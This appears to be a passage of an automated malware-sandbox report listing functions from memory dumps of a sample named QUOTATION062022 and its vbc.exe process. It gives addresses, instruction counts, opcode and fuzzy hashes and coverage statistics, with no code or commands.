Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd891b103be516f32bc217df1fc35fa02e3360078bc6cdb4937a678c972948c2
Instruction ID: c0c8bc5040759a0294430f51ede583a462172887c72b08fa7c1583e0a5424bd1
Opcode Fuzzy Hash: dd891b103be516f32bc217df1fc35fa02e3360078bc6cdb4937a678c972948c2
Instruction Fuzzy Hash: E9F0273EB005218B4B686A8D942491A72DBCFC6AB831A803BE50DCB315EF70CC01C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 02890B75 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9beeeaa32271e9bb544f3ad9ddbf2bd7f981686a0aa833d8b95e0e30f6c453cf
Instruction ID: d2d914e5d78df8cd2c8fa94ecbf8f56c1a5c5173b5a593b5b3f0f712c4406d0f
Opcode Fuzzy Hash: 9beeeaa32271e9bb544f3ad9ddbf2bd7f981686a0aa833d8b95e0e30f6c453cf
Instruction Fuzzy Hash: 2FF0E23D6097518FCB254A5D9864D667BB29FC227871E80BFD84ECB223D6358802CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02890554 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9fb54109a91bede22295f130063d3ef09008df93e482b6efe21edf2abf0b2f
Instruction ID: eafa5214a722ab0be64fd4732734b88afeb91f8afd53d1cc2e141dc47a64bb3e
Opcode Fuzzy Hash: 1e9fb54109a91bede22295f130063d3ef09008df93e482b6efe21edf2abf0b2f
Instruction Fuzzy Hash: 9DF0ED6938E3D14FD74757745824090BF70AE9351430E40E7D4C4CF5A3D5698C89CB63

Uniqueness

Uniqueness Score: -1.00%

Function 02890444 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5dbbc61ac2eedbbf980060b12ea77653ead1c7aa9a7aadee53fa42c93254e7
Instruction ID: 6fb37bffd00bd6b9cb67154885aadb9eff9ac081c4ace9de9da9107b5ed86bd2
Opcode Fuzzy Hash: 8b5dbbc61ac2eedbbf980060b12ea77653ead1c7aa9a7aadee53fa42c93254e7
Instruction Fuzzy Hash: A5F0C96864E3C24FDB175B3848200517F716E9711831E81EBC0C5CF6A3CA298C49C723

Uniqueness

Uniqueness Score: -1.00%

Function 028912D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4cf94ee89e8c45c2f1b930f3f98ea61952425776f873ab0430503937a06251
Instruction ID: 733f4ca4bda3464e4fce0bf6e3493005fbbbddab8535119379fa20503beade14
Opcode Fuzzy Hash: ec4cf94ee89e8c45c2f1b930f3f98ea61952425776f873ab0430503937a06251
Instruction Fuzzy Hash: 0CE0923870D7924FCF07676C44242927FB28F8741831D41FB808ACEA56C9298C868762

Uniqueness

Uniqueness Score: -1.00%

Function 028907E8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f8df9f6deb3b6579987477da0afa3a1bf0ff3590ee75eba095ad9cfabaf233
Instruction ID: 279f6c54a7944a8e57372f21d17a9c58b296f46ec14b81b76018159439ed225b
Opcode Fuzzy Hash: c4f8df9f6deb3b6579987477da0afa3a1bf0ff3590ee75eba095ad9cfabaf233
Instruction Fuzzy Hash: BEE06D3834D3C98FDB035B649C100A03FB16E4311174D80E7D484CF663CA285845C762

Uniqueness

Uniqueness Score: -1.00%

Function 02891190 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ef3ff376b0688a14458f99c3649ef048ef73d58a1f63abf796a89564441b86
Instruction ID: 2a0829ced8becfbb0391f8300edaae5d02281c1ae4b3e93f2b4ab9207d25e365
Opcode Fuzzy Hash: 61ef3ff376b0688a14458f99c3649ef048ef73d58a1f63abf796a89564441b86
Instruction Fuzzy Hash: 2AE06D2870D7864FCB17573948241627FF60F8701831D84FB8048CFAA7CA28888AC392

Uniqueness

Uniqueness Score: -1.00%

Function 02890920 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ea244e8e43b3988c18b0b9f243829f0bb9ab3bcb807c80a45e06ea7a5ad9af
Instruction ID: e5a4b3b91a8868ec4a3783a2f819dfa644afa7716ddaad41c9030d99626fa693
Opcode Fuzzy Hash: 91ea244e8e43b3988c18b0b9f243829f0bb9ab3bcb807c80a45e06ea7a5ad9af
Instruction Fuzzy Hash: EDE01A3954E3C18FDB435B304C741A57FB05E9326931A00EBC4C5CE2A3D679488ACB23

Uniqueness

Uniqueness Score: -1.00%

Function 02890830 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66fd3a6fee0b345b4bf405e4432a19dac7dbc85a9d8b485f7485052c93ed980
Instruction ID: 0d0e9aa1109f02fc7489154cc49b889d5b17016efb4ceddba4d97a0c50b76d79
Opcode Fuzzy Hash: b66fd3a6fee0b345b4bf405e4432a19dac7dbc85a9d8b485f7485052c93ed980
Instruction Fuzzy Hash: B1E0123110D3D46FC7131B645824A957FB59F47250B0A40DBE884CF1A3DA690865D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 02890F78 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e389ceb6a6e2c470d208f017eb3b2b7886b452ba7a9c1448a7056779a0c10e
Instruction ID: d19c8d064ced9ad468d9aa4a0f6e69de2835d209fe7a840060d51b2ca9a35109
Opcode Fuzzy Hash: 38e389ceb6a6e2c470d208f017eb3b2b7886b452ba7a9c1448a7056779a0c10e
Instruction Fuzzy Hash: 6EE01A2528E3C14FCB039B3458742693F712E5724535E44EBD4C1CF6A3EA2C9919C763

Uniqueness

Uniqueness Score: -1.00%

Function 02890400 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 255bbeb1a00ac7d89cf23ed885eb74720d0b24da35c3bab4b19ac54705f1d481
Instruction ID: 4cc5e85e47beb1d026366a059326b9b1e6a5e322c19819ced41c48d4fb742611
Opcode Fuzzy Hash: 255bbeb1a00ac7d89cf23ed885eb74720d0b24da35c3bab4b19ac54705f1d481
Instruction Fuzzy Hash: 08E01A3860E3814FCB1A962884353667B325F8310CF9D80FA8485CEA93C6264846C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 02890520 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3537e77d3e13402d86c744983a5b4e75021bc7e2d142fdb15ca81c07b938f82
Instruction ID: 61d6c99d9654ae7160494fc91bc5b37121aad7872a7fcde4dd1101c58a9047ce
Opcode Fuzzy Hash: c3537e77d3e13402d86c744983a5b4e75021bc7e2d142fdb15ca81c07b938f82
Instruction Fuzzy Hash: CDE0426560E7D11FCB531BB428252883FB59E4766470B15EFD080DF2A3DA580D498366

Uniqueness

Uniqueness Score: -1.00%

Function 028902BC Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1caa172ccdae62f298109b65c7ff97b350f29afa68c4904c76f15422593c7c75
Instruction ID: 2695d3fe44b801d875afbba3396419186c91c4c54e83f87ae76129beb1551459
Opcode Fuzzy Hash: 1caa172ccdae62f298109b65c7ff97b350f29afa68c4904c76f15422593c7c75
Instruction Fuzzy Hash: 27D0676121E7E14FC7072B786C245587FB0AE8B16430A04DBE491CB2E3C6694C49CB72

Uniqueness

Uniqueness Score: -1.00%

Function 02890800 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2995aa17692c4ae5ad64c703f80b17bfa3a5d1e17655d84b64172808d8c911c2
Instruction ID: 053216a47856380c9173dfa46a87c46ad8ea3c94f44536b6e2b637f72844d83d
Opcode Fuzzy Hash: 2995aa17692c4ae5ad64c703f80b17bfa3a5d1e17655d84b64172808d8c911c2
Instruction Fuzzy Hash: 7CD05E3C71010D8F6BA4A769842442633E76FC5506318C065A10ADB761EF31B8008691

Uniqueness

Uniqueness Score: -1.00%

Function 02890848 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70eaf504503f4085039a6ffd5df258f31ae7fc2d207f5063c0da9a32570b9221
Instruction ID: b46e7b1cb62a56d9f7d81d5e7c2f26545b439cc073caae2ca14ae97281d5b5cb
Opcode Fuzzy Hash: 70eaf504503f4085039a6ffd5df258f31ae7fc2d207f5063c0da9a32570b9221
Instruction Fuzzy Hash: 04C0123264816C674B056F98A4108EE7B9FEB892B17008126FD4986200CE724D70D7E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E95728 Relevance: 4.4, Instructions: 4352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294739377.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f626e81e639b46fd7db869178c363be75fdd5dfd84b554751705a81641e3a954
Instruction ID: 17548fcd37e1da7c487606ca13e930294670e7297c9a8eb2136a3d97f6179dee
Opcode Fuzzy Hash: f626e81e639b46fd7db869178c363be75fdd5dfd84b554751705a81641e3a954
Instruction Fuzzy Hash: 57933B70E15168CFDB54EF39D985A9CBBB2FF88200F0045EAD448A7258DB386E95CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 6728, Parent PID: 6328COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 073668F8 Relevance: 1.2, Instructions: 1234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af2006a25609a17b820c62e2f0a7e679de270a4e370d3405571a02edac43075d
Instruction ID: 5a4a6611c2ea19e609839a7acec0354013277ed7cb6eec64662136900edcdf9a
Opcode Fuzzy Hash: af2006a25609a17b820c62e2f0a7e679de270a4e370d3405571a02edac43075d
Instruction Fuzzy Hash: D692DFB07102159FDF15ABB4D86962E76E3EFC8204F69882DE50ADB395DF74CC028B91

Uniqueness

Uniqueness Score: -1.00%

Function 0736BE80 Relevance: .6, Instructions: 594
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9b5f91497912d0119b54acaa0832a1ae19dda0ad9fb72996978c57a5f3a0ee
Instruction ID: 1ff094aaaae2ea4dfe25a0e2fcd8e5fcc267bba4571e910a31f3bb00ce3efa53
Opcode Fuzzy Hash: ad9b5f91497912d0119b54acaa0832a1ae19dda0ad9fb72996978c57a5f3a0ee
Instruction Fuzzy Hash: D622B0B07042559FEB15EB34D459A2EBBE2EF85204F15C869E84ACB395CF34DC42C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 07361D98 Relevance: .3, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60babb19a33bd488840b5755c6a283cfd9cc93a713fcf16f3aa7ebc7a6b6ff7c
Instruction ID: dc4060dcd56a2fa32a5d47af8390ec1e8a09c800919dd7ceb6de9eadb6ac81f4
Opcode Fuzzy Hash: 60babb19a33bd488840b5755c6a283cfd9cc93a713fcf16f3aa7ebc7a6b6ff7c
Instruction Fuzzy Hash: 7BD168B4B002069FDB18DF69D59896EB7F2FF88210B25C468E80ADB355DB35EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 058808E0 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 05880947

Memory Dump Source

Source File: 00000004.00000002.378537314.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_vbc.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: f16227c1e334260afff6f86d53978e6f659a6cf89df67ccaabcdb086aa61ba75
Instruction ID: 95735c6014274d080c9c0546a3e196ac63e9f374be833eb60db0613c515d5f30
Opcode Fuzzy Hash: f16227c1e334260afff6f86d53978e6f659a6cf89df67ccaabcdb086aa61ba75
Instruction Fuzzy Hash: 04112871D043498FDB10EFAAD4457EEBBF4EB48328F14841ED569A7240DB346944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 058808E8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 05880947

Memory Dump Source

Source File: 00000004.00000002.378537314.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_vbc.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 396c636d46ae060e00f3c43c0413a1aa587eedcd507b824de247f7b21518c8ca
Instruction ID: 22f14373a084e761fe29ca0280298ea41c6af8efb167d51a3dadd2c8f7693e89
Opcode Fuzzy Hash: 396c636d46ae060e00f3c43c0413a1aa587eedcd507b824de247f7b21518c8ca
Instruction Fuzzy Hash: 9D110A71D043498FDB10DFAAD4457EFBBF4EB48224F158419D559A7240CB746944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07368C70 Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x5tk, xrefs: 07368CEB

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID: x5tk
API String ID: 0-1012692022
Opcode ID: 7077a00bfbd1028d4a17983ac70168fa40dc7702d09b3707abb653de64675b8a
Instruction ID: a29a19f2d5000f6f332aea1d694fbeb2151aea98dd451b0d2723d30de091a2c6
Opcode Fuzzy Hash: 7077a00bfbd1028d4a17983ac70168fa40dc7702d09b3707abb653de64675b8a
Instruction Fuzzy Hash: DD3103713052104FDB15AB38D85D56DBBE6EFC921471688BDE54ACB382DF31CC0687A1

Uniqueness

Uniqueness Score: -1.00%

Function 0736F150 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106326d61063cf8f624a3ef1ce6e88955c72eb1459f5aa91a9055585287a02dc
Instruction ID: 4de66831e3075520d0e04957f5d25c5c7a8ae9ed42f23a241d5c66236a24d51a
Opcode Fuzzy Hash: 106326d61063cf8f624a3ef1ce6e88955c72eb1459f5aa91a9055585287a02dc
Instruction Fuzzy Hash: 29A1E2B5B142178FEB29DB68E498B6DB7A6EF85210F15C069D90DCB759CB31EC00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07368170 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d107d68aa21697070a809b736b0d3aad4ce9574571014b6c977f6780f3eeb013
Instruction ID: 6daef6bbd45db2404924452863bbcc63333d5c6862db1723512640a5c8f6b8ea
Opcode Fuzzy Hash: d107d68aa21697070a809b736b0d3aad4ce9574571014b6c977f6780f3eeb013
Instruction Fuzzy Hash: 4881D5B0B002199FCB14EBB4D4596AEB7F2EF89204F61C479D509DB385DF349D028BA2

Uniqueness

Uniqueness Score: -1.00%

Function 07363850 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55579389b8a04923e2f9cd49cc9f60940ac4cf415eba29c53c08fe9be8a33d0a
Instruction ID: d0c13231369f2e9e936709f540b4ed66483b32db14f5c27fa7d9e9eac433d587
Opcode Fuzzy Hash: 55579389b8a04923e2f9cd49cc9f60940ac4cf415eba29c53c08fe9be8a33d0a
Instruction Fuzzy Hash: FA7104B1B042059FDB15EB34D899A6DBBB2EF81204F15C96AD409CB395DF34DC0ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0736CC00 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637ae30a2ad28065d25f8c3cde023f8fa969d96f50a8a5560f82b9f3f0fbaf51
Instruction ID: d8b8ff5ff1b6dd9ad4d875d75bf4102f184b5b67737ccef765c67c48eb3c5605
Opcode Fuzzy Hash: 637ae30a2ad28065d25f8c3cde023f8fa969d96f50a8a5560f82b9f3f0fbaf51
Instruction Fuzzy Hash: 66812DB0A10249DFDB14DFA8C498AADBFF2BF49300F149469E44AEB355CB70A845CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0736A370 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f2e8eb2e2cc487644f3671acca8a1c2f3abd52a47097e9b4ecf2c88145c46f8
Instruction ID: 9605f4b0e4a6d0253e4379649cef4cf49748f7b1d0e8b2ec08d5d791b6e79d0c
Opcode Fuzzy Hash: 8f2e8eb2e2cc487644f3671acca8a1c2f3abd52a47097e9b4ecf2c88145c46f8
Instruction Fuzzy Hash: 7C5134B27082A18FEB16DB38D45C56ABBB5EF86220B19C0AED549CB316DE75DC01C750

Uniqueness

Uniqueness Score: -1.00%

Function 07364B50 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44d767c8ad755c1ec3dde4957d16c4b4599050132eec7c4f554a7d9667cb6fd
Instruction ID: 0a68711e15bb09597a40a0cc26ac0aee4e2673e7d72129a7269839948f5b7c21
Opcode Fuzzy Hash: a44d767c8ad755c1ec3dde4957d16c4b4599050132eec7c4f554a7d9667cb6fd
Instruction Fuzzy Hash: 88519D74B102488FEB54DB68C498AAE7BF2EF89224F158068E906DB395DF30DC41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 07369F48 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f12e0a5525e8fa9a7a02a6aecd65a8b382a5f77d234ddb93b52d90c0f5653ac
Instruction ID: f0eeb7cee79bc2252b32576b01e20ad86feaf8c83be2018c70aadc0a38dafe89
Opcode Fuzzy Hash: 1f12e0a5525e8fa9a7a02a6aecd65a8b382a5f77d234ddb93b52d90c0f5653ac
Instruction Fuzzy Hash: 9651DB307152518FC725EB38D85956EBBE6EFC9215315C4BEE90AC7352DE30DC0287A1

Uniqueness

Uniqueness Score: -1.00%

Function 07369D60 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585945795fe6e05d350bfe3c679f1ae7e7de4dea5a68ecc5cbc3be9e1d0160c3
Instruction ID: df8b9f5146f06c003643e09f53a8a76b96d4e4dd57b0525b718db0107773c610
Opcode Fuzzy Hash: 585945795fe6e05d350bfe3c679f1ae7e7de4dea5a68ecc5cbc3be9e1d0160c3
Instruction Fuzzy Hash: CB51EC747042168FDB14EB38D4186AE7BE6EF85218F15893EE44ACB381DF30DC068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 07362440 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a844e31f2fb8883316a4f31a730f099a3a8ecffb5f4d1d1cb2ac1d9ece25cf
Instruction ID: 5ad4faff0258b9de18fd593f36530d13058e0eb513983cd9a4e941e36e18a4c6
Opcode Fuzzy Hash: e9a844e31f2fb8883316a4f31a730f099a3a8ecffb5f4d1d1cb2ac1d9ece25cf
Instruction Fuzzy Hash: 55513EB5A00105DFEB05DF61CC94EAABBBAFFC9310F01C065EA099B265DB35D811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0736A900 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f2c426f5a3962a062244b49c45e9fba42def4d7159de489622c492634e60ae
Instruction ID: f7077acf0f66c69b58d79989c5c72cf8b21e69a423411b77a327d531f2baed71
Opcode Fuzzy Hash: 90f2c426f5a3962a062244b49c45e9fba42def4d7159de489622c492634e60ae
Instruction Fuzzy Hash: 365156B47105058FDB14DF24E98D92EBBF2AF88201B15C469E807D7356DF30ED029BA2

Uniqueness

Uniqueness Score: -1.00%

Function 07365DF0 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b07296847248841e8f52ba390d4b0558f3d438060be8fb92c2552c6527323c
Instruction ID: 719fef036fef467f84af5b5ec9bfb87a9433f71142bf4580707d981c6c07d3b2
Opcode Fuzzy Hash: 23b07296847248841e8f52ba390d4b0558f3d438060be8fb92c2552c6527323c
Instruction Fuzzy Hash: B331C2B57002059FDB10AB78D8197AE7BE6EF89310F148439E54ADB384DF719C42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0736ED70 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e61bf8c53710231c8df6c5756e65342f60554ec33711950ef4c9362022715d
Instruction ID: 4436673a1c6e0af9dc2c73239aae48de12c61ad58ff526a0c9379c9780e1189e
Opcode Fuzzy Hash: 18e61bf8c53710231c8df6c5756e65342f60554ec33711950ef4c9362022715d
Instruction Fuzzy Hash: 6A416374700215CFDB14DF64D488A6EB7B2FF88304F148518E91A97394DB71EC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 073623F5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf527dfc617b21c22d7db443ea3c1e639aafffea4d620a8e96f0f9f8c4b61ef
Instruction ID: c5cdcb52e4037dec5062a763b161fe1fbb49ba3c9bb2825623252ad62de42255
Opcode Fuzzy Hash: baf527dfc617b21c22d7db443ea3c1e639aafffea4d620a8e96f0f9f8c4b61ef
Instruction Fuzzy Hash: C441B2B5A00209DFEB04DF74C8449AFBBB6FF89300F12C469E9099B265DB35D841CB50

Uniqueness

Uniqueness Score: -1.00%

